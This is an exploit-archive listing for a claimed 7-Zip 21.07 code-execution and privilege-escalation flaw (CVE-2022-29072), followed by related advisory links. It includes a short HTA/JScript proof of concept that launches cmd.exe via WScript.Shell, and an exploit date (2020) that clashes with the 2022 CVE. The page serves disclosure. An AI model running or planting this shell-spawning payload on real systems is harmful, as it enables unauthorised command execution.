Lucene search
Kagan CaparPACKETSTORM:166763HistoryApr 19, 2022 - 12:00 a.m.
7-Zip 21.07 Code Execution / Privilege Escalation
2022-04-1900:00:00
Kagan Capar
packetstormsecurity.com
432
`# Exploit Title: 7-zip - Code Execution / Local Privilege Escalation
# Exploit Author: Kagan Capar
# Date: 2020-04-12
# Vendor homepage: https://www.7-zip.org/
# Software link: https://www.7-zip.org/a/7z2107-x64.msi
# Version: 21.07 and all versions
# Tested On: Windows 10 Pro (x64)
# References: https://github.com/kagancapar/CVE-2022-29072
# About:
7-Zip through 21.07 on Windows allows privilege escalation and command execution when a file with the .7z extension is dragged to the Help>Contents area.
# Proof of Concept:
<html>
<head>
<HTA:APPLICATION ID="7zipcodeexec">
<script language="jscript">
var c = "cmd.exe";
new ActiveXObject('WScript.Shell').Run(c);
</script>
<head>
<html>
`
Related
zdt
zdt
7-zip - Code Execution / Local Privilege Escalation Exploit
2022-04-19 00:00:00
kaspersky
kaspersky
KLA12514 PE vulnerability in 7-Zip
2022-04-15 00:00:00
cve
cve
CVE-2022-29072
2022-04-15 20:15:00
githubexploit
githubexploit
Exploit for Out-of-bounds Write in 7-Zip
2022-04-18 18:59:01
Exploit for Out-of-bounds Write in 7-Zip
2022-04-15 22:59:03
Exploit for Out-of-bounds Write in 7-Zip
2022-04-18 17:08:43
exploitdb
exploitdb
7-zip - Code Execution / Local Privilege Escalation
2022-04-19 00:00:00
prion
prion
Design/Logic Flaw
2022-04-15 20:15:00
hivepro
hivepro
What will be the consequence of this disputed vulnerability in 7-ZIP?
2022-04-26 12:22:45
Weekly Threat Digest: 18 – 24 April 2022
2022-04-27 12:44:38
Related for PACKETSTORM:166763